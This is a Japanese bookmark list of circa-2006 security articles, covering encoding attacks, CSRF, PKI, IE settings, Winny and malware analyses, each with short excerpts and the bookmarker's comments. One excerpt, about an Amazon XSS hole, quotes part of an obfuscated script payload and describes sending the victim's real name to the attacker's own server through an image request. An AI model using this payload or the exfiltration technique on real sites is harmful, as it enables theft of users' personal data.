タグ

セキュリティに関するtks_periodのブックマーク (180)

  • yohgaki's blog - これからのプログラムの作り方 - 文字エンコーディング検証は必須

    (Last Updated On: 2016年3月3日)最近PostgreSQLMySQL両方にSJISエンコーディングを利用している際のエスケープ方法の問題を修正がリリースされています。この件は単純に「データベースシステムにセキュリティ上の脆弱性があった」と言う問題ではなく「アプリケーションの作り方を変える必要性」を提起した問題です。 参考:セキュアなアプリケーションのアーキテクチャ – sandbox化 PostgreSQLMySQLの脆弱性は特にSJIS等、マルチバイト文字に\が含まれる文字エンコーディングが大きな影響を受けますが、同類の不正な文字エンコーディングを利用した攻撃方法が他の文字エンコーディングでも可能です。例えば、UTF-8エンコーディングは1文字を構成するバイト列の最初のバイトの何ビット目までが1であるか、を取得してUTF-8文字として1バイト~6バイト必要なのか

    yohgaki's blog - これからのプログラムの作り方 - 文字エンコーディング検証は必須
  • ボヤキ:猿真似は危険『「Ajax PHP」でRSSリーダーを作る』で破滅 - livedoor Blog(ブログ)

    これは愚行録です。 サイトを閉鎖したため、こちらへ転記します。(by 破滅した管理人) 3月8日付けのエントリー『「Ajax + PHP」でRSSリーダーを作る』 「RSSリーダーを作ってみたい」という思いつきで始めた今回の一件。 さて「RSSリーダー」ってどうやって作るんだろうか。 とネット検索してみると初心者向けの分かりやすいページが見つかった。 Ajaxを使おう RSSリーダーを作る 掲載されているソースの改造に取り掛かるが、すぐに壁にぶち当たる。 「summary」の表示が上手くいかない。 「<summary>」なら良いのだが「<summary type="text/plain">」だと「[object Object]」が表示されてしまう。 なんだろうね、これって。 summary = xml.feed.entry[i].summary.type なら「text/plain」が表示

    tks_period
    tks_period 2006/06/06
    内容を理解しないコピペプログラムは大変危険であることを、身をもって実証した記事。 そのうちPL法がソフトウェアどころかコード片にも適用されたりしてねwww
  • mixiミュージック - 消えたアーティスト :: ぼくはまちちゃん!

    ↓これ、ぼくのお気に入りのアーティスト「はまちや2」さん (わー同じ名前!) (クリックで拡大画像) インディーズっていうのかな。 マイナーな割には結構コアなファンがいたりして、 自分と同じように、よく iTunes なんかで聴いているひともいてたみたい! だから mixiミュージックでも視聴回数が、ぶっちぎりの 442回! ランキングでも、かなり上位にいたと思うよ! だけど… さっき、なにげなく mixiミュージックのランキングを見てみたら… (クリックで拡大画像) 消えてる>< どこにもいなくなってる>< あれれ「上位 98件」って! アーティスト「はまちや2」さんの曲が、ちょうど2曲消えちゃってるんだけど…! ( 「ぼくはまちちゃん!」って曲と、「こんにちはこんにちは!!」って曲だよ ) わーなんでいなくなってるのーって思って、 アーティスト「はまちや2」さんのページを確認してみたら

    tks_period
    tks_period 2006/05/24
    ワロスwwwwwwwww
  • FrontPage - HackingWiki

    ハッキング Wiki † ハッキングの関連のあれこれについてまとめてみようと思っているwikiです。悪いことには使わないでください(たぶん使えないと思いますが)。 内容は少しずつ充実させていきたいと思っていますが、wikiの使い方はあまりわかっていないので事故で消えるかもしれません。 硬いので文体を「ですます」にしようと思います。 誰も編集しないので編集できないように戻しました。編集したい人はyamamoto at bogus.jp宛にメールするか、blogにでも書き込むか、電話でもしてください。。 ↑

  • 本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!

    ↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9

  • 高木浩光@自宅の日記 - IE 7のセキュリティ改善を台無しにするIE 7 Beta2日本語版

    ■ IE 7のセキュリティ改善を台無しにするIE 7 Beta2日語版 「セキュリティで保護された」というと何を思い浮かべるだろうか。Windows用語のような気がするが、普通は、SSLによる接続( https:// ページへのアクセス)のことを連想するだろう。(「セキュリティ(暗号化処理)で保護された接続」など。) それはともかく、Internet Explorer 7 がさまざまなセキュリティ上の改良を施していることは既に報道等で伝えられているところだ*1が、報道されていないところとして、「インターネットゾーン」のセキュリティ設定の画面の改善がある。 凶悪設定3兄弟の改善 図1の「Download signed ActiveX controls」の部分は、日語版で言うところの「署名済み ActiveX コントロールのダウンロード」という、悪名高い設定項目で、アホな業者がしばしばこれ

    tks_period
    tks_period 2006/05/15
    機械翻訳でいいなら人は要らないんですが。てか実際人割いてないのかね?
  • CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですね の対策 - 2nd life (移転しました)

    hoshikuzu | star_dust の書斎#P20060428MHTMLREDIRECT で指摘されているように、現在の WinIE では mhtml スキームを悪用して、クロスドメインの html を取得することが可能になってしまっています。これを利用したはまちちゃんの実証コードを踏んだ人も居るでしょう(実際に WinIE だと情報が抜かれるので、安易に WinIE で見に行かないで下さい)。 この対策として id:hosikuzu:20060428#P20060428MHTMLREDIRECT では以下のような対策方法が提示されています。 そもそも信頼できないページを見ない IE使わない アクティブスクリプトとAxtiveXを切る レジストリでmhtmlスキームのハンドラを殺す この中で一番簡単かつ安心なのは WinIE を使わないことですが、IE コンポーネントブラウザなどを

    CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですね の対策 - 2nd life (移転しました)
  • 産経ニュース

    銀行が19日にマイナス金利政策の解除を決めたことで、住宅ローン金利が上昇する可能性が高まった。日銀が短期金利をマイナス0・1%から0~0・1%程度に0・1ポイント以上引き上げたことで、短期金利に連動する住宅ローンの変動金利が0・1ポイント程度上がるとの見方もある。日…

    産経ニュース
  • サービス終了のお知らせ

    サービス終了のお知らせ いつもYahoo! JAPANのサービスをご利用いただき誠にありがとうございます。 お客様がアクセスされたサービスは日までにサービスを終了いたしました。 今後ともYahoo! JAPANのサービスをご愛顧くださいますよう、よろしくお願いいたします。

  • うっかりだまされてしまう8つの質問

    ソーシャルエンジニアリングが使われた事例を分析すると、幾つかのパターンが存在していることが分かる。プロの詐欺師は、状況に応じて複数のパターンを組み合わせている。情報を盗まれないためには、個別の攻撃パターンを理解することが役に立つ。 これは、フィッシング詐欺で使われる最も簡単なメールの一文だ。この文を読んで「こんな言葉にだまされない」と思ったのではないだろうか。だが、この一文にはソーシャルエンジニアリングで使われるパターンを見つけることができる。ここには、金融機関からの電子メールを思わせる「ネームドロップ」、期間を限定する「ハリーアップ」といった手法が使われている。プロの詐欺師はこのようなパターンを複数組み合わることで、相手の信頼を獲得し、必要な情報を引き出すのである。 それではソーシャルエンジニアリングで用いられる攻撃パターンを分類し、特徴を説明しよう。 きっかけを探し出す「トラッシング(

    うっかりだまされてしまう8つの質問
    tks_period
    tks_period 2006/04/18
    テクニカルワードやバッファオーバーフローなんかは日常でもよく使われるよな。
  • 高木浩光@自宅の日記 - 国土交通省電子申請システムにも英知出版みたいな記述が

    ■ Winny利用教唆セキュリティ対策指南、その仰天内容 先日、Winnyに対する意見を求められる取材申し込みが立て続けにあった。「現状を把握しておかねば」と思い、書店にずらりと並べられていると噂に聞いていた、Winny利用教唆を何冊か買ってみることにした。とくに次の一冊の謳い文句が興味をひいた。 Winnyやりてぇー! 初心者のための「ファイル共有入門」, 英知出版, 2005年12月発売 こわーいウィルスから個人情報を完全に守る方法教えます!今日パソコンを買ってすぐ『ファイル共有』を初めたい人大集合!!!!!「ファイル共有」ヤバ〜イ、『お宝映像』もカンタンにダウンロードできる!! ほほう。さっそく通販で購入して目を通してみた。 しかし、ざっと見た限りどこにも「個人情報を完全に守る方法」らしきものは見当たらない*1。 それよりも目に飛び込んできたのは、はじめの方に書かれているこのペ

    tks_period
    tks_period 2006/04/13
    酷いな。まー人の振り見て我が振り直せということで。
  • 高木浩光@自宅の日記 - CSRF対策に「ワンタイムトークン」方式を推奨しない理由

    水色の四角は画面を表し、白抜き実線枠の四角はボタンを表す。 これを、Webアプリという実装手法を選択する場合に特化すると、図2のような遷移図が描ける。 実線矢印はブラウザが送信するHTTPのrequest(ヘッダおよび、POSTの場合はボディを含む)を表し、黄色の丸がサーバ側での1アクセスの処理を表し、点線がその処理結果を返すHTTPのresponse(ヘッダおよび、HTML)を表す。responseの上の文はHTMLの内容を説明するものである。黄色の丸の中の文は処理内容の説明であり、ここから複数のresponse矢印が出ている場合、処理の結果によって遷移先の画面が異なる場合であることを表し、破線の白抜き四角がその分岐の条件を概説している。 この図で例に用いているのは、ECサイトやblogサービスなどに見られる典型的な「登録個人情報変更」の機能である。「メインメニュー」画面の「登録情報変更

  • http://mrdc.s169.xrea.com/hitachi/hitachi.swf

    tks_period
    tks_period 2006/04/06
    ちょwwwwwwwwwwwwwwwwwwww
  • 5分で絶対に分かるPKI

    公開鍵基盤とはいったい何だ Public Key Infrastructure(PKI)は、一般的な日語訳では「公開鍵暗号基盤」もしくは、「公開鍵暗号方式を利用したセキュリティインフラ」だと言われる。しかしそういわれても、その実体や機能はさっぱり伝わってこない。 一方で、電子署名法の施行や電子政府構想など、社会的にPKIの重要度が確実に高まってきている。いったいPKIとは何なのだろうか、この記事は、わずか5分でその疑問をすっかり解決することに挑戦した。 PKIの分かりにくさは、主に複数の技術の組み合わせであることと、インフラであるがゆえのつかみどころのなさに起因する。しかし、そのコンセプトはそれほど複雑ではない。さっそく説明を始めよう。

    5分で絶対に分かるPKI
    tks_period
    tks_period 2006/04/05
    タイトルがなぁ… 人に教える用、だけど、プライド高い人は怒りそうだwww 知人用としてはかなりよさげ。
  • ITmedia エンタープライズ:「山田オルタネイティブ」の動作を知る (1/2)

    Antinnyと同時にメディアで名前が取り上げられるようになった「山田オルタネイティブ」(仮称)は非常に悪質なマルウェアだ。その動作と注意点を紹介しよう。 たびたび報じられている通り、Antinnyによる情報流出事件は後を絶たない。 普通に考えれば、わざわざマルウェアを実行して感染し、Winnyやネットワーク上に情報を流出させようなどと考える人はいないだろう。正体の怪しいファイルを実行しなければ感染は防げるのだが、ファイル名をごまかしたりして人の弱点を突いてくるのが、「仁義なきキンタマ」こと「Antinny」をはじめとするマルウェアの嫌なところだ。 この記事では、Antinnyと同時にメディアで名前が取り上げられるようになったもう1つのマルウェア「山田オルタネイティブ」(仮称)(注)の挙動について説明したい。 もともと「山田ウイルス」と称するマルウェア(正確にはトロイの木馬)が登場したのは

    ITmedia エンタープライズ:「山田オルタネイティブ」の動作を知る (1/2)
    tks_period
    tks_period 2006/04/05
    動作の概要は理解してたけどExerbだとは知らなかった。我ながら情報が遅い。 ダウソ板には長い事行ってないなぁ。
  • 大学のネットワークへの Winny PC の接続が禁止されました - Ceekz Logs (Move to y.ceek.jp)

    TWINS という履修管理システムにログインして、事務からのお知らせを見ていたら「データファイル交換ソフト(Winny)のインストールされたパソコンの接続禁止について」という通達が出ているではありませんか。 学内ネットワークに接続するパソコンには Winny をインストールしないでください。また、自宅のパソコンにも Winny をインストールしないことをお勧めします。 という通達です。 自衛手段を教えるよりも、使用を禁止する方が手っ取り早いのは同意するが、教育機関が行う行動なのだろうか。また、学内ネットワーク上での Winny の使用禁止ではなく、インストールされている PC の接続を禁止されました。これも意味不明。 研究室の PC にインストールされることを想定しているのかもしれないけど、無線 LAN を利用した私的 PC の接続もありうるわけで。つーか、読めば読むほどおかしな通達文だな

    tks_period
    tks_period 2006/04/05
    真に研究に使うならそれは、きちんと管理されていてWクリック猿は扱えない設定で情報漏洩はありませんよ、と申請するのが筋じゃない? 劇薬(と社会的に認知されてるもの)を所構わず使っていいわけじゃない。
  • http://oku.edu.mie-u.ac.jp/~okumura/pukiwiki/?2005-06-11

    tks_period
    tks_period 2006/04/04
    うお、こんなのあったのか。すげぇ…
  • JavaScript WSSE Header Generator

    JavaScript WSSE Header Generator UserName: Password: Nonce: auto Created: auto Basic-Autentication Username: Basic-Autentication Password: Before X-WSSE: GET /atom/ HTTP/1.1 Host: localhost After X-WSSE: sha1.js base64.js KOSEKI Kengo <kengo at tt.rim.or.jp>

    tks_period
    tks_period 2006/04/04
    WSSE認証時のヘッダをJSで生成。自前ツールのassertに便利。
  • CLUB Pocket PC

    すべての Microsoft 製品 Global Office Windows Surface Xbox セール サポート ソフトウェア Windows アプリ OneDrive Outlook Skype OneNote PC とデバイス アクセサリ エンタメ Xbox ゲーム (ダウンロード) Windows ゲーム 映画テレビ番組 法人向け Azure Dynamics 365 Microsoft 365 データ プラットフォーム 法人向け Developer & IT .NET Visual Studio Windows Server デベロッパー センター ドキュメント その他 Microsoft Store Microsoft Rewards 無料ダウンロード & セキュリティ プリペイド カード サイトマップの表示

    tks_period
    tks_period 2006/03/16
    MSにクレーム来たんだろうなぁw どうせならインターネットを作ったアメリカ防総省DARPAにクレーム入れなよw  中身は分かりやすくていい感じ。ほんとは機密情報を持ち出さないのが原則だけど。
  • セキュリティホール買います - ぼくはまちちゃん!

    webサービスのバグとかセキュリティホールみたいなのって、 あらかじめ全部ふさいでおくのなんて無理な話なんだよね…! できるだけそういう穴が無いようにプログラムを組んでいくのって 実際すごく難しかったり泥臭かったりする作業なんだと思うよ! しかも、はてなみたいな自由度の高いサービスならなおさらだよね! (それなのに、はてなってすごくしっかり作ってあると思うんだけど!たぶん…!) かといって、テストとか穴探しだけのために人材を用意できるかっていうと それも判断が難しいところなんじゃないかな、と思うんだ…! きっと大きな企業でもないと、なかなか、そこまでまとまったお金のかけにくい部分なんじゃないかな! 幸い、はてなは、コンピュータ20年くらいいじってるようなパワーユーザーちゃんから 愛されてる感じだから「ここ穴があいてるよー」みたいな報告をユーザーからもらえたりすることも多いのかな。 だけどそ

    セキュリティホール買います - ぼくはまちちゃん!
    tks_period
    tks_period 2006/03/16
    人によっては「賄賂を合法化」並に感じるかも知れないけど、素直に考えれば不特定多数へのデバッグのアウトソーシングって感じで良さそうに見える。